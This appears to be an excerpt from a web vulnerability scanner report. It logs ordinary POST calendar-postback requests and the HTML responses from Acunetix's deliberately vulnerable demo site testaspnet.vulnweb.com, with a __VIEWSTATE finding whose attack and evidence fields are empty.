Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8624&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBAWBLHmtsIZGRkVeTJLgQPexkv1MqVstV0GZEHqYE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKw5OLNCgKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogZPXB0eEnFKn%2B1epEQDeC3tbLN%2BbQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:37:35 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBAWBLHmtsIZGRkVeTJLgQPexkv1MqVstV0GZEHqYE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKw5OLNCgKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogZPXB0eEnFKn+1epEQDeC3tbLN+bQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:White" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8612&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBAYxVZkdsIZGRkzPT2oLH9Yf7YwT2PxfjPs8jPaJI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLVkJXzCQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogaFaC%2FjZAcpY%2BUUzhN%2FkQGPxAd92A%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:02:40 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBAYxVZkdsIZGRkzPT2oLH9Yf7YwT2PxfjPs8jPaJI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLVkJXzCQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogaFaC/jZAcpY+UUzhN/kQGPxAd92A==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:White" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
